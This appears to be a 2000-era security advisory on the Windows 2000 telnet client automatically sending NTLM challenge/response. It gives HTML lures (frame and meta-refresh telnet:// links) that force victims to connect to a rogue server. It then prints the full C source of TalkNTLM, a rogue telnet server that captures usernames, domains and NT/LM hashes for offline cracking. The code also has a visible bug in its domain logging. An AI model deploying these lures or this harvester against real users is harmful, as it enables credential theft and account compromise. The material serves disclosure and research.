source: By default, the telnet client (telnet.exe) shipped with Microsoft Windows 2000 utilizes Windows NT Challenge/Response (NTLM) as an authentication method. When establishing a connection to a host, the telnet client will attempt authentication via NTLM, regardless of whether or not the host is a Windows telnet server or not. There is a possibility that the NTLM challenge/response authentication session could be monitored and subsequently cracked, which could lead to the disclosure of sensitive information such as usernames, passwords, domains, etc. The NTLM challenge/response protocol is known to be susceptible to brute-force cracking, as demonstrated in the tool "L0phtcrack." Forcing a telnet session on a remote target is a trivial task because products such as Microsoft Internet Explorer, Outlook (Express), Netscape Navigator, etc. will automatically open URLs with a "telnet://" prefix in a default telnet client (which is normally telnet.exe). The following are some examples of how one could open a telnet session on a specified rogue server: 1) frame src=telnet://target 2) meta http-equiv="refresh" content="0;URL=telnet://telnet-attacker" 3)"telnet://target") /* TalkNTLM - NTLM Logging Telnet Server * [email protected] * 8/14/00 * Copyright (C) 2000 @stake, Inc. */ #include<stdio.h> #include<string.h> #include<unistd.h> #include<stdlib.h> #include<ctype.h> #include<sys/socket.h> #include<sys/types.h> #include<sys/wait.h> #include<netinet/in.h> #include<arpa/inet.h> #define MAJOR_VERSION 1 #define MINOR_VERSION 0 #define IAC 255 /* interpret as command: */ #define DONT 254 /* you are not to use option */ #define DO 253 /* please, you use option */ #define WONT 252 /* I won't use option */ #define WILL 251 /* I will use option */ #define SB 250 /* interpret as subnegotiation */ #define SE 240 /* end sub negotiation */ #define AUTH 37 #define IS 0 #define SEND 1 #define REPLY 2 #define NAME 3 #define NTLM 15 #define ACCEPT 1 typedef enum { METHOD_NONE=0, METHOD_TELNET } METHOD; typedef enum { SUBMETHOD_NONE=0, SUBMETHOD_LOG, } SUBMETHOD; #define COMMSOCK_BUFSIZ 2048 FILE *g_fCommSock; char g_CommSockBuf[COMMSOCK_BUFSIZ]; void error(const char *str) { fflush(stdout); fprintf(stderr,str); fflush(stderr); } unsigned char getb(void) { unsigned char b=0; fread(&b,1,1,g_fCommSock); return b; } unsigned short getdwl(void) { unsigned short s=0; s|=((unsigned short)getb()); s|=((unsigned short)getb())<<8; return s; } unsigned long getddl(void) { unsigned long l=0; l|=((unsigned long)getb()); l|=((unsigned long)getb())<<8; l|=((unsigned long)getb())<<16; l|=((unsigned long)getb())<<24; return l; } void putb(unsigned char c) { fwrite(&c,1,1,g_fCommSock); } void putdwl(unsigned short w) { putb(w&255); putb((w>>8)&255); } void putddl(unsigned long d) { putb(d&255); putb((d>>8)&255); putb((d>>16)&255); putb((d>>24)&255); } void putarrb(int n, unsigned char *b) { int i; for(i=0;i<n;i++) { putb(b[i]); } } void putarrc(int n, char *c) { putarrb(n,(unsigned char *)c); } void putflush(void) { fflush(g_fCommSock); } void debugb(unsigned char c) { fprintf(stderr,"%d\t\t%X\t'%c'\n\r",c,c,(isalnum(c)?c:' ')); } int listenport(int port, struct sockaddr_in *rsaddr) { // Create socket int s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); if(s<0) { error("couldn't create socket.\n"); return -1; } int reuse=1; if(setsockopt(s,SOL_SOCKET,SO_REUSEADDR,&reuse,sizeof(int))<0) { error("couldn't set socket option.\n"); close(s); return -2; } // Bind to port struct sockaddr_in saddr; memset(&saddr,0,sizeof(struct sockaddr_in)); saddr.sin_port=htons(port); saddr.sin_family=AF_INET; if(bind(s,(struct sockaddr *)&saddr,sizeof(struct sockaddr_in))<0) { error("couldn't bind.\n"); close(s); return -3; } // Listen on port; if(listen(s,1)<0) { error("couldn't listen.\n"); close(s); return -4; } // Accept connection unsigned int socklen=sizeof(struct sockaddr_in); memset(rsaddr,0,socklen); int as; if((as=accept(s,(struct sockaddr *)rsaddr,&socklen))<0) { error("couldn't accept.\n"); close(s); return -5; } // Close listener close(s); return as; } int do_telnet_log(int port, char *logfile) { FILE *lf=NULL; while(1) { // Wait for telnet connection to come in struct sockaddr_in saddr; int s; printf("listening on port %d.\n",port); if((s=listenport(port,&saddr))<0) { error("telnet logging abort.\n"); return -1; } printf("recieved telnet connection from %s:%u.\n", inet_ntoa(saddr.sin_addr),ntohs(saddr.sin_port)); // Set this socket as out buffered packet socket g_fCommSock=fdopen(s,"r+b"); if(g_fCommSock==NULL) { error("couldn't fdopen comm socket.\n"); close(s); return -2; } setvbuf(g_fCommSock,g_CommSockBuf,_IOFBF,COMMSOCK_BUFSIZ); // Open logging file lf=fopen(logfile,"a+t"); if(lf==NULL) { error("couldn't open log file.\n"); fclose(g_fCommSock); return -3; } // Challenge to send unsigned char challenge[8]={255,255,255,255,255,255,255,255}; // Start authentication process unsigned char *respbuf=NULL; int size=0; putb(IAC); putb(DO); putb(AUTH); putflush(); printf(">> IAC DO AUTH\n"); // See if client wants to authenticate if(getb()!=IAC) goto telnetlogfail; if(getb()!=WILL) goto telnetlogfail; if(getb()!=AUTH) goto telnetlogfail; printf("<< IAC WILL AUTH\n"); // Present authentication methods putb(IAC); putb(SB); putb(AUTH); putb(SEND); putb(NTLM); putb(0); putb(IAC); putb(SE); putflush(); printf(">> IAC SB AUTH SEND NTLM 0 IAC SE\n"); // Get NTLMSSP initial request if(getb()!=IAC) goto telnetlogfail; if(getb()!=SB) goto telnetlogfail; if(getb()!=AUTH) goto telnetlogfail; if(getb()!=IS) goto telnetlogfail; if(getb()!=NTLM) goto telnetlogfail; if(getb()!=0) goto telnetlogfail; if(getb()!=0) goto telnetlogfail; size=getddl()+4; if(size>2048) goto telnetlogfail; respbuf=(unsigned char *)malloc(size); int i; for(i=0;i<size;i++) { respbuf[i]=getb(); } free(respbuf); if(getb()!=IAC) goto telnetlogfail; if(getb()!=SE) goto telnetlogfail; printf("<< IAC SB AUTH IS NTLM 0 0 ... IAC SE\n"); // Send accept putb(IAC); putb(SB); putb(AUTH); putb(REPLY); putb(NTLM); putb(0); putb(ACCEPT); putddl(0xA8); putddl(0x2); putarrc(8,"NTLMSSP"); putddl(0x2); putdwl(0x14); putdwl(0x14); putddl(0x30); putddl(0xE0828295); putarrb(8,challenge); putarrc(8,"\0\0\0\0\0\0\0\0"); putdwl(0x64); putdwl(0x64); putddl(0x44); putarrc(20,"A\0B\0C\0D\0E\0F\0G\0H\0I\0J\0"); putdwl(0x2); putdwl(0x14); putarrc(20,"A\0B\0C\0D\0E\0F\0G\0H\0I\0J\0"); putdwl(0x1); putdwl(0x14); putarrc(20,"A\0B\0C\0D\0E\0F\0G\0H\0I\0J\0"); putdwl(0x4); putdwl(0x14); putarrc(20,"A\0B\0C\0D\0E\0F\0G\0H\0I\0J\0"); putdwl(0x3); putdwl(0x14); putarrc(20,"A\0B\0C\0D\0E\0F\0G\0H\0I\0J\0"); putddl(0); putb(IAC); putb(SE); putflush(); printf(">> IAC SB AUTH REPLY NTLM 0 1 ... challenge ... IAC SE\n"); // Get the reply packet if(getb()!=IAC) goto telnetlogfail; if(getb()!=SB) goto telnetlogfail; if(getb()!=AUTH) goto telnetlogfail; if(getb()!=IS) goto telnetlogfail; if(getb()!=NTLM) goto telnetlogfail; if(getb()!=0) goto telnetlogfail; if(getb()!=2) goto telnetlogfail; size=getddl()+4; if(size>2048 || size<64) goto telnetlogfail; printf("8\n"); respbuf=(unsigned char *)malloc(size); for(i=0;i<size;i++) { respbuf[i]=getb(); //fprintf(stderr,"%2.2X: ",i); //debugb(respbuf[i]); } if(getb()!=IAC) goto telnetlogfail; if(getb()!=SE) goto telnetlogfail; printf("<< IAC SB AUTH IS NTLM 0 2 ... response ... IAC SE\n"); // Get username int usernamelen,usernameoff; char *username; usernamelen=respbuf[0x28] | (respbuf[0x29]<<8); usernameoff=respbuf[0x2C] | (respbuf[0x2D]<<8) | (respbuf[0x2E]<<16) | (respbuf[0x2F]<<24); username=(char *)malloc(usernamelen); if(!username) goto telnetlogfail; memcpy(username,&respbuf[usernameoff+4],usernamelen); printf("Username: "); for(i=0;i<usernamelen;i+=2) { printf("%c",username[i]); fprintf(lf,"%c",username[i]); username[i>>1]=username[i]; } usernamelen>>=1; printf("\n"); fprintf(lf,":"); free(username); // Get domainname int domainnamelen,domainnameoff; char *domainname; domainnamelen=respbuf[0x20] | (respbuf[0x21]<<8); domainnameoff=respbuf[0x24] | (respbuf[0x25]<<8) | (respbuf[0x26]<<16) | (respbuf[0x27]<<24); domainname=(char *)malloc(domainnamelen); if(!domainname) goto telnetlogfail; memcpy(domainname,&respbuf[domainnameoff+4],domainnamelen); printf("Domain: "); for(i=0;i<domainnamelen;i+=2) { printf("%c",domainname[i]); fprintf(lf,"%c",username[i]); domainname[i>>1]=domainname[i]; } domainnamelen>>=1; printf("\n"); fprintf(lf,":"); free(domainname); // Write challenge fprintf(lf,"%2.2X%2.2X%2.2X%2.2X%2.2X%2.2X%2.2X%2.2X:", challenge[0],challenge[1],challenge[2],challenge[3], challenge[4],challenge[5],challenge[6],challenge[7]); // Get NT response int ntresplen,ntrespoff; unsigned char *ntresp; ntresplen=respbuf[0x10] | (respbuf[0x11]<<8); ntrespoff=respbuf[0x14];// | (respbuf[0x15]<<8) | (respbuf[0x16]<<16) | (respbuf[0x17]<<24); ntresp=(unsigned char *)malloc(ntresplen); if(!ntresp) goto telnetlogfail; memcpy(ntresp,&respbuf[ntrespoff+4],ntresplen); printf("NT Response:\n"); for(i=0;i<ntresplen;i++) { printf("%2.2X ",ntresp[i]); fprintf(lf,"%2.2X",ntresp[i]); if(i%8==7) printf("\n"); } printf("\n"); fprintf(lf,":"); free(ntresp); // Get LM response int lmresplen,lmrespoff; unsigned char *lmresp; lmresplen=respbuf[0x18] | (respbuf[0x19]<<8); lmrespoff=respbuf[0x1C] | (respbuf[0x1D]<<8) | (respbuf[0x1E]<<16) | (respbuf[0x1F]<<24); lmresp=(unsigned char *)malloc(lmresplen); if(!lmresp) goto telnetlogfail; memcpy(lmresp,&respbuf[lmrespoff+4],lmresplen); printf("LM Response:\n"); for(i=0;i<lmresplen;i++) { printf("%2.2X ",lmresp[i]); fprintf(lf,"%2.2X",lmresp[i]); if(i%8==7) printf("\n"); } printf("\n"); fprintf(lf,"\n"); free(lmresp); free(respbuf); fclose(lf); // Close the telnet session fclose(g_fCommSock); printf("closed telnet socket.\n"); } return 0; telnetlogfail:; // Failure if(lf!=NULL) fclose(lf); printf("telnet negotiation failed.\n"); fclose(g_fCommSock); return -5; } void usage(char *progname,int exitcode) { printf("talkntlm v%d.%d (%s)\n",MAJOR_VERSION,MINOR_VERSION,progname); printf("usage: talkntlm -t [-p <port>] -l <challenge response logfile>\n",progname); exit(exitcode); } int main(int argc, char *argv[]) { unsigned char b; int i,tp; // Get options int opt_port=0; char *opt_logfile=NULL; METHOD opt_method=METHOD_NONE; SUBMETHOD opt_submethod=SUBMETHOD_NONE; char oc; while((oc=getopt(argc,argv,"l:p:t"))>0) { switch(oc) { case 't': opt_method=METHOD_TELNET; if(opt_port==0) { opt_port=23; } break; case 'p': opt_port=atoi(optarg); break; case 'l': opt_logfile=optarg; if(opt_submethod!=SUBMETHOD_NONE) usage(argv[0],-2); opt_submethod=SUBMETHOD_LOG; break; default: usage(argv[0],-3); break; } } // Go to the particular method if(opt_method==METHOD_NONE) { usage(argv[0],-4); } else if(opt_method==METHOD_TELNET) { // Telnet methods if(opt_submethod==SUBMETHOD_NONE) { usage(argv[0],-5); } else if(opt_submethod==SUBMETHOD_LOG) { // Telnet hash logging if(opt_logfile==NULL) { usage(argv[0],-7); } if(do_telnet_log(opt_port,opt_logfile)!=0) return -8; } } return 0; }